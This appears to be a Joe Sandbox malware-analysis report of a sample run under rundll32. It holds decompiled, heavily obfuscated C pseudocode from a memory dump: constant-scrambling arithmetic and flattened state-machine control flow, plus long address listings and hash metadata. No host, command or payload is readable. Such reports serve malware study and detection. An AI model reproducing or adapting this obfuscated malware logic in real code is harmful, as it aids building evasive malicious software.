				_v104 = 0x8a8082;
				_v104 = _v104 * 0x3f;
				_v104 = _v104 ^ 0x2214377a;
				_v212 = 0x18307b;
				_v212 = _v212 ^ 0x4b6e1055;
				_v212 = _v212 ^ 0x41119872;
				_v212 = _v212 ^ 0x0a6c434c;
				_v132 = 0x8b3f3c;
				_v132 = _v132 << 2;
				_v132 = _v132 ^ 0x022c35f2;
				_v328 = 0x314aa5;
				_v328 = _v328 | 0xbabb419f;
				_v328 = _v328 / _t782;
				_v328 = _v328 + 0xe73f;
				_v328 = _v328 ^ 0x01f1132e;
				_v140 = 0x403514;
				_v140 = _v140 + 0xffff4e06;
				_v140 = _v140 ^ 0x0039264a;
				while(1) {
					L1:
					_t783 = 0xf0ee26a;
					_t842 = 0xbf4f028;
					_t716 = 0xc1f5c56;
					do {
						while(1) {
							L2:
							_t878 = _t766 - _t716;
							if(_t878 > 0) {
								break;
							}
							if(_t878 == 0) {
								_push(_v160);
								_push(_v112);
								_t732 = E0038DCF7(_v396, 0x371884, __eflags);
								_push(_v392);
								_t866 = _t732;
								_push(_v384);
								_t733 = E0038DCF7(_v152, 0x371924, __eflags);
								_v76 = _v124;
								_t735 = E0037CB52(_v376, _t866, _v268, _v116, _v144);
								_v68 = _v68 & 0x00000000;
								_v72 = _t866;
								_v80 = 2 + _t735 * 2;
								_v60 =  &_v80;
								_v92 = _v88;
								_v64 = 1;
								_t741 = E00378D13( &_v32, _v200, _v368,  &_v92, _v84, _t733, _v312,  &_v68, _v88, _v320, _v136, _v236);
								_t875 =  &(_t875[0x11]);
								__eflags = _t741 - _v304;
								_t766 =  ==  ? 0xbf4f028 : 0xf9e92c1;
								E0037A8B0(_v296, _t866, _v196);
								E0037A8B0(_v360, _t733, _v288);
								_t864 = 0xf9e92c1;
								goto L24;
							} else {
								if(_t766 == 0xdec32e) {
									_t746 =  *0x393dfc; // 0x0
									E00388519(_v104, _v212,  *((intOrPtr*)(_t746 + 0x50)));
									_t766 = _t864;
									while(1) {
										L1:
										_t783 = 0xf0ee26a;
										_t842 = 0xbf4f028;
										_t716 = 0xc1f5c56;
										goto L2;
									}
								} else {
									if(_t766 == 0x41de8e2) {
										_t766 = 0xe078043;
										continue;
									} else {
										if(_t766 == _t868) {
											_push(_v128);
											_push(_v184);
											_t871 = E0038DCF7(_v372, 0x371904, __eflags);
											_t585 =  &_v300; // 0x3e0de8e7
											_v44 =  *_t585;
											_v40 = _v252;
											_pop(_t807);
											_v36 = _v100;
											_t752 =  *0x393dfc; // 0x0
											_t754 =  *0x393dfc; // 0x0
											_t755 =  *0x393dfc; // 0x0
											_t757 = E0038D84C(_t807, _v120, _t755 + 0x64, _v276,  *((intOrPtr*)(_t754 + 0x54)), _v96, _v176, _v244, _v284, _v228, _v292, _t807, _t748,  &_v44,  *((intOrPtr*)(_t752 + 0x50)));
											_t875 =  &(_t875[0xd]);
											__eflags = _t757 - _v348;
											if(_t757 != _v348) {
												_t766 = 0xdec32e;
											} else {
												_t766 = _t864;
												_t873 = 1;
											}
											E0037A8B0(_v364, _t871, _v168);
											goto L24;
										} else {
											_t882 = _t766 - _t842;
											if(_t766 == _t842) {
												_push(_v192);
												_push(_v332);
												_t759 = E0038DCF7(_v108, 0x3718b4, _t882);
												_pop(_t812);
												_t760 =  *0x393dfc; // 0x0
												E00390B68(_t759,  &_v92, _v220, _v204, _t812, _t760 + 0x54, _v308, _v260, _v316, _v388, _v96, _v256);
												_t766 =  ==  ? 0xf0ee26a : _t864;
												E0037A8B0(_v340, _t759, _v380);
												L23:
												_t875 =  &(_t875[0xb]);
												L24:
												_t842 = 0xbf4f028;
												_t783 = 0xf0ee26a;
												_t868 = 0x80c65ec;
												_t716 = 0xc1f5c56;
											}
										}
										goto L25;
									}
								}
							}
							L20:
							return _t873;
						}
						__eflags = _t766 - 0xe078043;
						if(__eflags == 0) {
							_push(_v264);
							_push(_v352);
							_t717 = E0038DCF7(_v324, 0x3718e4, __eflags);
							_push(_v248);
							_push(_v180);
							_t718 = E0038DCF7(_v240, 0x371814, __eflags);
							_t665 =  &_v172; // 0x39264a
							__eflags = E00379462(_t717,  *_t665,  &_v96, _t718, _v336, _v344) - _v232;
							_t766 =  ==  ? 0xc1f5c56 : 0x1d0239b;
							E0037A8B0(_v216, _t717, _v224);
							E0037A8B0(_v148, _t718, _v156);
							_t864 = 0xf9e92c1;
							goto L23;
						} else {
							__eflags = _t766 - _t783;
							if(_t766 == _t783) {
								_t848 =  *0x393dfc; // 0x0
								_push(_t783);
								_push(_t783);
								_t792 = E00377FF2( *((intOrPtr*)(_t848 + 0x54)));
								_t730 =  *0x393dfc; // 0x0
								__eflags = _t792;
								_t766 =  !=  ? _t868 : _t864;
								 *((intOrPtr*)(_t730 + 0x50)) = _t792;
								goto L1;
							} else {
								__eflags = _t766 - _t864;
								if(__eflags != 0) {
									goto L25;
								} else {
									_t646 =  &_v140; // 0x39264a
									E0037957D(_v96, _v132, _v328, _v208,  *_t646);
								}
							}
						}
						goto L20;
						L25:
					} while (_t766 != 0x1d0239b);
					goto L20;
				}
			}







































































































































                                                                                                                                                            0x00372bd9
                                                                                                                                                            0x00372bdf
                                                                                                                                                            0x00372bee
                                                                                                                                                            0x00372bf0
                                                                                                                                                            0x00372bf7
                                                                                                                                                            0x00372bfe
                                                                                                                                                            0x00372c03
                                                                                                                                                            0x00372c0a
                                                                                                                                                            0x00372c12
                                                                                                                                                            0x00372c1a
                                                                                                                                                            0x00372c22
                                                                                                                                                            0x00372c2a
                                                                                                                                                            0x00372c35
                                                                                                                                                            0x00372c40
                                                                                                                                                            0x00372c4b
                                                                                                                                                            0x00372c56
                                                                                                                                                            0x00372c61
                                                                                                                                                            0x00372c6c
                                                                                                                                                            0x00372c77
                                                                                                                                                            0x00372c88
                                                                                                                                                            0x00372c89
                                                                                                                                                            0x00372c8d
                                                                                                                                                            0x00372c92
                                                                                                                                                            0x00372c9a
                                                                                                                                                            0x00372ca2
                                                                                                                                                            0x00372cad
                                                                                                                                                            0x00372cb8
                                                                                                                                                            0x00372cc3
                                                                                                                                                            0x00372cce
                                                                                                                                                            0x00372cd9
                                                                                                                                                            0x00372ce1
                                                                                                                                                            0x00372cec
                                                                                                                                                            0x00372cf7
                                                                                                                                                            0x00372cff
                                                                                                                                                            0x00372d04
                                                                                                                                                            0x00372d09
                                                                                                                                                            0x00372d11
                                                                                                                                                            0x00372d1c
                                                                                                                                                            0x00372d2e
                                                                                                                                                            0x00372d35
                                                                                                                                                            0x00372d40
                                                                                                                                                            0x00372d48
                                                                                                                                                            0x00372d50
                                                                                                                                                            0x00372d5d
                                                                                                                                                            0x00372d61
                                                                                                                                                            0x00372d69
                                                                                                                                                            0x00372d76
                                                                                                                                                            0x00372d80
                                                                                                                                                            0x00372d84
                                                                                                                                                            0x00372d8c
                                                                                                                                                            0x00372d94
                                                                                                                                                            0x00372d9c
                                                                                                                                                            0x00372da9
                                                                                                                                                            0x00372dad
                                                                                                                                                            0x00372db5
                                                                                                                                                            0x00372dc0
                                                                                                                                                            0x00372dc8
                                                                                                                                                            0x00372dd3
                                                                                                                                                            0x00372dde
                                                                                                                                                            0x00372de9
                                                                                                                                                            0x00372df4
                                                                                                                                                            0x00372dff
                                                                                                                                                            0x00372e07
                                                                                                                                                            0x00372e0b
                                                                                                                                                            0x00372e13
                                                                                                                                                            0x00372e1d
                                                                                                                                                            0x00372e29
                                                                                                                                                            0x00372e2e
                                                                                                                                                            0x00372e34
                                                                                                                                                            0x00372e39
                                                                                                                                                            0x00372e41
                                                                                                                                                            0x00372e49
                                                                                                                                                            0x00372e54
                                                                                                                                                            0x00372e5f
                                                                                                                                                            0x00372e6a
                                                                                                                                                            0x00372e75
                                                                                                                                                            0x00372e80
                                                                                                                                                            0x00372e8b
                                                                                                                                                            0x00372e96
                                                                                                                                                            0x00372ea1
                                                                                                                                                            0x00372eac
                                                                                                                                                            0x00372eb7
                                                                                                                                                            0x00372ec2
                                                                                                                                                            0x00372ed5
                                                                                                                                                            0x00372ed6
                                                                                                                                                            0x00372edd
                                                                                                                                                            0x00372ee8
                                                                                                                                                            0x00372ef3
                                                                                                                                                            0x00372f06
                                                                                                                                                            0x00372f0d
                                                                                                                                                            0x00372f18
                                                                                                                                                            0x00372f2c
                                                                                                                                                            0x00372f33
                                                                                                                                                            0x00372f3e
                                                                                                                                                            0x00372f46
                                                                                                                                                            0x00372f4e
                                                                                                                                                            0x00372f53
                                                                                                                                                            0x00372f58
                                                                                                                                                            0x00372f60
                                                                                                                                                            0x00372f6b
                                                                                                                                                            0x00372f7e
                                                                                                                                                            0x00372f85
                                                                                                                                                            0x00372f90
                                                                                                                                                            0x00372fa3
                                                                                                                                                            0x00372fb2
                                                                                                                                                            0x00372fb9
                                                                                                                                                            0x00372fc4
                                                                                                                                                            0x00372fcf
                                                                                                                                                            0x00372fda
                                                                                                                                                            0x00372fe5
                                                                                                                                                            0x00372ff0
                                                                                                                                                            0x00372ffb
                                                                                                                                                            0x00373006
                                                                                                                                                            0x0037300e
                                                                                                                                                            0x00373016
                                                                                                                                                            0x0037301b
                                                                                                                                                            0x00373023
                                                                                                                                                            0x0037302b
                                                                                                                                                            0x00373036
                                                                                                                                                            0x00373041
                                                                                                                                                            0x0037304c
                                                                                                                                                            0x00373057
                                                                                                                                                            0x00373062
                                                                                                                                                            0x0037306d
                                                                                                                                                            0x00373078
                                                                                                                                                            0x00373083
                                                                                                                                                            0x0037308e
                                                                                                                                                            0x00373096
                                                                                                                                                            0x003730a3
                                                                                                                                                            0x003730a7
                                                                                                                                                            0x003730af
                                                                                                                                                            0x003730b7
                                                                                                                                                            0x003730bf
                                                                                                                                                            0x003730c7
                                                                                                                                                            0x003730cf
                                                                                                                                                            0x003730d7
                                                                                                                                                            0x003730df
                                                                                                                                                            0x003730e9
                                                                                                                                                            0x003730ee
                                                                                                                                                            0x003730f6
                                                                                                                                                            0x003730fb
                                                                                                                                                            0x00373103
                                                                                                                                                            0x0037310e
                                                                                                                                                            0x00373119
                                                                                                                                                            0x00373121
                                                                                                                                                            0x0037312c
                                                                                                                                                            0x00373141
                                                                                                                                                            0x00373144
                                                                                                                                                            0x0037314b
                                                                                                                                                            0x00373156
                                                                                                                                                            0x00373169
                                                                                                                                                            0x00373170
                                                                                                                                                            0x0037317b
                                                                                                                                                            0x00373191
                                                                                                                                                            0x00373198
                                                                                                                                                            0x003731a3
                                                                                                                                                            0x003731ab
                                                                                                                                                            0x003731b0
                                                                                                                                                            0x003731b4
                                                                                                                                                            0x003731bc
                                                                                                                                                            0x003731c4
                                                                                                                                                            0x003731cc
                                                                                                                                                            0x003731d4
                                                                                                                                                            0x003731dc
                                                                                                                                                            0x003731e4
                                                                                                                                                            0x003731f4
                                                                                                                                                            0x003731fc
                                                                                                                                                            0x00373201
                                                                                                                                                            0x00373207
                                                                                                                                                            0x0037320f
                                                                                                                                                            0x00373221
                                                                                                                                                            0x00373226
                                                                                                                                                            0x0037322f
                                                                                                                                                            0x0037323a
                                                                                                                                                            0x00373242
                                                                                                                                                            0x0037324a
                                                                                                                                                            0x00373252
                                                                                                                                                            0x0037325a
                                                                                                                                                            0x00373265
                                                                                                                                                            0x0037326d
                                                                                                                                                            0x00373278
                                                                                                                                                            0x00373284
                                                                                                                                                            0x00373289
                                                                                                                                                            0x00373293
                                                                                                                                                            0x00373298
                                                                                                                                                            0x003732a2
                                                                                                                                                            0x003732a5
                                                                                                                                                            0x003732a9
                                                                                                                                                            0x003732b1
                                                                                                                                                            0x003732c2
                                                                                                                                                            0x003732c5
                                                                                                                                                            0x003732cc
                                                                                                                                                            0x003732d7
                                                                                                                                                            0x003732e2
                                                                                                                                                            0x003732ed
                                                                                                                                                            0x003732f8
                                                                                                                                                            0x00373303
                                                                                                                                                            0x0037330b
                                                                                                                                                            0x00373313
                                                                                                                                                            0x0037331b
                                                                                                                                                            0x00373323
                                                                                                                                                            0x0037332b
                                                                                                                                                            0x00373336
                                                                                                                                                            0x00373341
                                                                                                                                                            0x0037334c
                                                                                                                                                            0x00373357
                                                                                                                                                            0x0037335e
                                                                                                                                                            0x00373369
                                                                                                                                                            0x00373371
                                                                                                                                                            0x00373379
                                                                                                                                                            0x00373381
                                                                                                                                                            0x00373389
                                                                                                                                                            0x00373394
                                                                                                                                                            0x003733a7
                                                                                                                                                            0x003733ae
                                                                                                                                                            0x003733b9
                                                                                                                                                            0x003733c1
                                                                                                                                                            0x003733c6
                                                                                                                                                            0x003733cb
                                                                                                                                                            0x003733d3
                                                                                                                                                            0x003733db
                                                                                                                                                            0x003733e0
                                                                                                                                                            0x003733e8
                                                                                                                                                            0x003733f0
                                                                                                                                                            0x003733f8
                                                                                                                                                            0x00373403
                                                                                                                                                            0x0037340e
                                                                                                                                                            0x00373416
                                                                                                                                                            0x00373421
                                                                                                                                                            0x0037342d
                                                                                                                                                            0x00373430
                                                                                                                                                            0x00373434
                                                                                                                                                            0x0037343c
                                                                                                                                                            0x00373444
                                                                                                                                                            0x0037344c
                                                                                                                                                            0x00373454
                                                                                                                                                            0x00373459
                                                                                                                                                            0x00373461
                                                                                                                                                            0x00373466
                                                                                                                                                            0x0037346e
                                                                                                                                                            0x00373479
                                                                                                                                                            0x00373484
                                                                                                                                                            0x0037348f
                                                                                                                                                            0x0037349a
                                                                                                                                                            0x003734a5
                                                                                                                                                            0x003734ad
                                                                                                                                                            0x003734b8
                                                                                                                                                            0x003734c3
                                                                                                                                                            0x003734ce
                                                                                                                                                            0x003734d9
                                                                                                                                                            0x003734e4
                                                                                                                                                            0x003734ec
                                                                                                                                                            0x003734f1
                                                                                                                                                            0x003734f6
                                                                                                                                                            0x003734fe
                                                                                                                                                            0x00373506
                                                                                                                                                            0x00373511
                                                                                                                                                            0x0037351c
                                                                                                                                                            0x00373527
                                                                                                                                                            0x00373532
                                                                                                                                                            0x0037353d
                                                                                                                                                            0x0037354a
                                                                                                                                                            0x00373555
                                                                                                                                                            0x0037355a
                                                                                                                                                            0x00373565
                                                                                                                                                            0x0037356a
                                                                                                                                                            0x00373575
                                                                                                                                                            0x00373580
                                                                                                                                                            0x00373588
                                                                                                                                                            0x00373593
                                                                                                                                                            0x0037359e
                                                                                                                                                            0x003735a9
                                                                                                                                                            0x003735b4
                                                                                                                                                            0x003735bf
                                                                                                                                                            0x003735d4
                                                                                                                                                            0x003735d5
                                                                                                                                                            0x003735e0
                                                                                                                                                            0x003735e7
                                                                                                                                                            0x003735f2
                                                                                                                                                            0x003735fd
                                                                                                                                                            0x00373608
                                                                                                                                                            0x00373613
                                                                                                                                                            0x0037361e
                                                                                                                                                            0x00373629
                                                                                                                                                            0x00373634
                                                                                                                                                            0x0037363c
                                                                                                                                                            0x00373647
                                                                                                                                                            0x00373652
                                                                                                                                                            0x0037365f
                                                                                                                                                            0x00373668
                                                                                                                                                            0x0037366c
                                                                                                                                                            0x00373674
                                                                                                                                                            0x0037367c
                                                                                                                                                            0x00373687
                                                                                                                                                            0x00373692
                                                                                                                                                            0x0037369d
                                                                                                                                                            0x003736b0
                                                                                                                                                            0x003736b7
                                                                                                                                                            0x003736c2
                                                                                                                                                            0x003736cd
                                                                                                                                                            0x003736d8
                                                                                                                                                            0x003736e3
                                                                                                                                                            0x003736ee
                                                                                                                                                            0x003736f9
                                                                                                                                                            0x00373701
                                                                                                                                                            0x0037370c
                                                                                                                                                            0x00373714
                                                                                                                                                            0x00373722
                                                                                                                                                            0x00373726
                                                                                                                                                            0x0037372e
                                                                                                                                                            0x00373736
                                                                                                                                                            0x00373741
                                                                                                                                                            0x0037374c
                                                                                                                                                            0x00373757
                                                                                                                                                            0x00373757
                                                                                                                                                            0x00373757
                                                                                                                                                            0x0037375c
                                                                                                                                                            0x00373761
                                                                                                                                                            0x00373766
                                                                                                                                                            0x00373766
                                                                                                                                                            0x00373766
                                                                                                                                                            0x00373766
                                                                                                                                                            0x00373768
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037376e
                                                                                                                                                            0x0037392a
                                                                                                                                                            0x00373936
                                                                                                                                                            0x00373941
                                                                                                                                                            0x00373946
                                                                                                                                                            0x0037394f
                                                                                                                                                            0x00373951
                                                                                                                                                            0x0037395c
                                                                                                                                                            0x00373973
                                                                                                                                                            0x0037398c
                                                                                                                                                            0x00373998
                                                                                                                                                            0x003739b5
                                                                                                                                                            0x003739c3
                                                                                                                                                            0x003739d1
                                                                                                                                                            0x003739e0
                                                                                                                                                            0x003739fd
                                                                                                                                                            0x00373a1c
                                                                                                                                                            0x00373a23
                                                                                                                                                            0x00373a2f
                                                                                                                                                            0x00373a43
                                                                                                                                                            0x00373a46
                                                                                                                                                            0x00373a58
                                                                                                                                                            0x00373a5f
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00373774
                                                                                                                                                            0x0037377a
                                                                                                                                                            0x00373907
                                                                                                                                                            0x0037391d
                                                                                                                                                            0x00373923
                                                                                                                                                            0x00373757
                                                                                                                                                            0x00373757
                                                                                                                                                            0x00373757
                                                                                                                                                            0x0037375c
                                                                                                                                                            0x00373761
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00373761
                                                                                                                                                            0x00373780
                                                                                                                                                            0x00373786
                                                                                                                                                            0x003738fd
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037378c
                                                                                                                                                            0x0037378e
                                                                                                                                                            0x00373829
                                                                                                                                                            0x00373835
                                                                                                                                                            0x00373845
                                                                                                                                                            0x00373847
                                                                                                                                                            0x0037384b
                                                                                                                                                            0x0037385a
                                                                                                                                                            0x00373868
                                                                                                                                                            0x00373869
                                                                                                                                                            0x00373870
                                                                                                                                                            0x003738a5
                                                                                                                                                            0x003738bb
                                                                                                                                                            0x003738cb
                                                                                                                                                            0x003738d0
                                                                                                                                                            0x003738d3
                                                                                                                                                            0x003738d7
                                                                                                                                                            0x003738e0
                                                                                                                                                            0x003738d9
                                                                                                                                                            0x003738db
                                                                                                                                                            0x003738dd
                                                                                                                                                            0x003738dd
                                                                                                                                                            0x003738f2
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00373794
                                                                                                                                                            0x00373794
                                                                                                                                                            0x00373796
                                                                                                                                                            0x0037379c
                                                                                                                                                            0x003737a8
                                                                                                                                                            0x003737b3
                                                                                                                                                            0x003737b9
                                                                                                                                                            0x003737e4
                                                                                                                                                            0x003737fe
                                                                                                                                                            0x0037381c
                                                                                                                                                            0x0037381f
                                                                                                                                                            0x00373b98
                                                                                                                                                            0x00373b98
                                                                                                                                                            0x00373b9b
                                                                                                                                                            0x00373b9b
                                                                                                                                                            0x00373ba0
                                                                                                                                                            0x00373ba5
                                                                                                                                                            0x00373baa
                                                                                                                                                            0x00373baa
                                                                                                                                                            0x00373796
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037378e
                                                                                                                                                            0x00373786
                                                                                                                                                            0x0037377a
                                                                                                                                                            0x00373aa7
                                                                                                                                                            0x00373ab1
                                                                                                                                                            0x00373ab1
                                                                                                                                                            0x00373a69
                                                                                                                                                            0x00373a6f
                                                                                                                                                            0x00373aef
                                                                                                                                                            0x00373afb
                                                                                                                                                            0x00373b03
                                                                                                                                                            0x00373b08
                                                                                                                                                            0x00373b16
                                                                                                                                                            0x00373b24
                                                                                                                                                            0x00373b3e
                                                                                                                                                            0x00373b68
                                                                                                                                                            0x00373b76
                                                                                                                                                            0x00373b79
                                                                                                                                                            0x00373b8e
                                                                                                                                                            0x00373b93
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00373a71
                                                                                                                                                            0x00373a71
                                                                                                                                                            0x00373a73
                                                                                                                                                            0x00373ac7
                                                                                                                                                            0x00373acd
                                                                                                                                                            0x00373ace
                                                                                                                                                            0x00373ad9
                                                                                                                                                            0x00373add
                                                                                                                                                            0x00373ae2
                                                                                                                                                            0x00373ae4
                                                                                                                                                            0x00373ae7
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00373a75
                                                                                                                                                            0x00373a75
                                                                                                                                                            0x00373a77
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00373a7d
                                                                                                                                                            0x00373a7d
                                                                                                                                                            0x00373a9d
                                                                                                                                                            0x00373aa2
                                                                                                                                                            0x00373a77
                                                                                                                                                            0x00373a73
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00373baf
                                                                                                                                                            0x00373baf
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00373bbb

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: "$ $(|?|$;]z$='mm$?$I*5$J&9$J&9$LCl$c@9$lT&$t1 $Y($>
                                                                                                                                                            • API String ID: 0-1427316221
                                                                                                                                                            • Opcode ID: 50fa236b9472a891bce0461b9606db3be74a307422fabb1085c6b06cd1cb4db2
                                                                                                                                                            • Instruction ID: 3e99ceef47ecd4cd9d70eecbdb974dcdcc4df1fc42e85754d0b4dd0f622ce7f8
                                                                                                                                                            • Opcode Fuzzy Hash: 50fa236b9472a891bce0461b9606db3be74a307422fabb1085c6b06cd1cb4db2
                                                                                                                                                            • Instruction Fuzzy Hash: 7272FEB15093818FD3B9CF25C58AB8BBBE1BBC5304F10891DE1DA86260DBB58949DF43
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 0038AE6D Relevance: 19.3, Strings: 15, Instructions: 522COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                            			E0038AE6D(void* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
				intOrPtr _v4;
				intOrPtr _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				unsigned int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				void* _t537;
				void* _t566;
				void* _t567;
				intOrPtr _t573;
				void* _t575;
				void* _t577;
				void* _t585;
				void* _t588;
				void* _t594;
				void* _t596;
				signed int _t603;
				signed int _t604;
				signed int _t605;
				signed int _t606;
				signed int _t607;
				signed int _t608;
				signed int _t609;
				signed int _t610;
				void* _t611;
				void* _t633;
				void* _t660;
				void* _t675;
				intOrPtr _t677;
				intOrPtr _t680;
				signed int* _t682;
				void* _t685;

				_push(_a20);
				_t677 = __edx;
				_push(_a16);
				_v24 = __edx;
				_push(0x20);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003820B9(_t537);
				_v8 = 0x673696;
				_t680 = 0;
				_v4 = 0;
				_t682 =  &(( &_v272)[7]);
				_v144 = 0xf00d33;
				_v144 = _v144 | 0x228e8b2e;
				_t596 = 0x1d3710;
				_v144 = _v144 >> 8;
				_v144 = _v144 ^ 0x0022fe8f;
				_v244 = 0xde08aa;
				_t603 = 0x17;
				_v244 = _v244 / _t603;
				_v244 = _v244 + 0xffff54ea;
				_v244 = _v244 << 0xa;
				_v244 = _v244 ^ 0x23f0fc00;
				_v224 = 0x36cb35;
				_v224 = _v224 | 0xc39aec51;
				_v224 = _v224 + 0x9146;
				_t604 = 0x62;
				_v224 = _v224 * 0x70;
				_v224 = _v224 ^ 0xa3c851d0;
				_v116 = 0xf2e64b;
				_v116 = _v116 << 5;
				_v116 = _v116 ^ 0x1e5cc960;
				_v248 = 0x2b7d5f;
				_t43 =  &_v248; // 0x2b7d5f
				_v248 =  *_t43 * 0x53;
				_v248 = _v248 + 0x8561;
				_v248 = _v248 | 0xae4dc352;
				_v248 = _v248 ^ 0xae5feb7e;
				_v80 = 0xe6036b;
				_v80 = _v80 * 0xb;
				_v80 = _v80 ^ 0x09e22599;
				_v240 = 0x5b8b4f;
				_v240 = _v240 + 0xffffe1e0;
				_v240 = _v240 ^ 0xb7b7812a;
				_v240 = _v240 + 0xffff41e0;
				_v240 = _v240 ^ 0xb7ec2de5;
				_v232 = 0xf81ab6;
				_v232 = _v232 ^ 0xa56b9217;
				_v232 = _v232 | 0x431a55e8;
				_v232 = _v232 << 7;
				_v232 = _v232 ^ 0xcdeef480;
				_v184 = 0xddfe73;
				_v184 = _v184 * 0x26;
				_v184 = _v184 << 8;
				_v184 = _v184 ^ 0xf3c51200;
				_v120 = 0x644fb5;
				_v120 = _v120 >> 6;
				_v120 = _v120 / _t604;
				_v120 = _v120 ^ 0x00000418;
				_v60 = 0xc6ff9f;
				_v60 = _v60 ^ 0x0d96ce7d;
				_v60 = _v60 ^ 0x0d5031e2;
				_v204 = 0xeedb74;
				_v204 = _v204 >> 0xb;
				_v204 = _v204 >> 0xa;
				_v204 = _v204 | 0xba569879;
				_v204 = _v204 ^ 0xba56987f;
				_v268 = 0x9a0618;
				_v268 = _v268 ^ 0x10270239;
				_v268 = _v268 ^ 0x733075d3;
				_t605 = 0x16;
				_v268 = _v268 / _t605;
				_v268 = _v268 ^ 0x04865c22;
				_v160 = 0x655fad;
				_v160 = _v160 >> 3;
				_v160 = _v160 >> 4;
				_v160 = _v160 ^ 0x0009a8dc;
				_v272 = 0x9202;
				_v272 = _v272 | 0xfb135803;
				_t606 = 0x41;
				_v272 = _v272 * 0x2c;
				_v272 = _v272 << 1;
				_v272 = _v272 ^ 0x4ed07035;
				_v100 = 0x536289;
				_v100 = _v100 << 9;
				_v100 = _v100 ^ 0xa6cd28cf;
				_v108 = 0xf021d8;
				_v108 = _v108 ^ 0x8f8b6ed2;
				_v108 = _v108 ^ 0x8f701d8c;
				_v152 = 0xcba027;
				_v152 = _v152 ^ 0xce0cd109;
				_v152 = _v152 | 0x7dfb06f6;
				_v152 = _v152 ^ 0xfff88f5e;
				_v252 = 0xf09c41;
				_v252 = _v252 + 0x8e2a;
				_v252 = _v252 << 3;
				_v252 = _v252 | 0xdb831f2c;
				_v252 = _v252 ^ 0xdf846234;
				_v260 = 0x3d692f;
				_v260 = _v260 << 2;
				_v260 = _v260 | 0xbfb4a027;
				_v260 = _v260 + 0x643;
				_v260 = _v260 ^ 0xbffb0fde;
				_v92 = 0x80bca7;
				_v92 = _v92 >> 0xa;
				_v92 = _v92 ^ 0x00038c1c;
				_v228 = 0xbbbc43;
				_v228 = _v228 | 0x61282476;
				_v228 = _v228 + 0xffff6ee2;
				_v228 = _v228 * 0x69;
				_v228 = _v228 ^ 0x15ccd750;
				_v236 = 0xc2062f;
				_v236 = _v236 | 0xf7f3ef67;
				_v236 = _v236 * 0x5c;
				_v236 = _v236 ^ 0x1ba01eed;
				_v128 = 0xa773bc;
				_v128 = _v128 << 0x10;
				_v128 = _v128 | 0xe162daa5;
				_v128 = _v128 ^ 0xf3f36b57;
				_v136 = 0x3287f3;
				_v136 = _v136 / _t606;
				_v136 = _v136 >> 9;
				_v136 = _v136 ^ 0x000c37d1;
				_v104 = 0x8d5fef;
				_v104 = _v104 + 0xffff56ea;
				_v104 = _v104 ^ 0x008f942b;
				_v44 = 0xd6bac6;
				_v44 = _v44 * 0x7f;
				_v44 = _v44 ^ 0x6a80c639;
				_v148 = 0xa4165e;
				_v148 = _v148 * 0x13;
				_v148 = _v148 | 0x84e82f79;
				_v148 = _v148 ^ 0x8cef9599;
				_v96 = 0xfc4916;
				_v96 = _v96 + 0xffff0795;
				_v96 = _v96 ^ 0x00f5cebb;
				_v132 = 0xd5d7c2;
				_v132 = _v132 >> 0x10;
				_v132 = _v132 << 0xd;
				_v132 = _v132 ^ 0x0010cc3c;
				_v264 = 0xf6e8cb;
				_v264 = _v264 + 0x6576;
				_v264 = _v264 + 0x7b15;
				_v264 = _v264 + 0x6b9c;
				_v264 = _v264 ^ 0x00fe3ec7;
				_v208 = 0x3a8541;
				_v208 = _v208 | 0x57459f57;
				_v208 = _v208 ^ 0x66631a8c;
				_v208 = _v208 | 0x178bfabb;
				_v208 = _v208 ^ 0x379a2cb6;
				_v56 = 0x33c5e6;
				_v56 = _v56 + 0x441;
				_v56 = _v56 ^ 0x0035e6a0;
				_v172 = 0x2bd4df;
				_v172 = _v172 + 0xda1f;
				_v172 = _v172 + 0x8171;
				_v172 = _v172 ^ 0x002cd084;
				_v48 = 0x796d26;
				_v48 = _v48 + 0xffff3152;
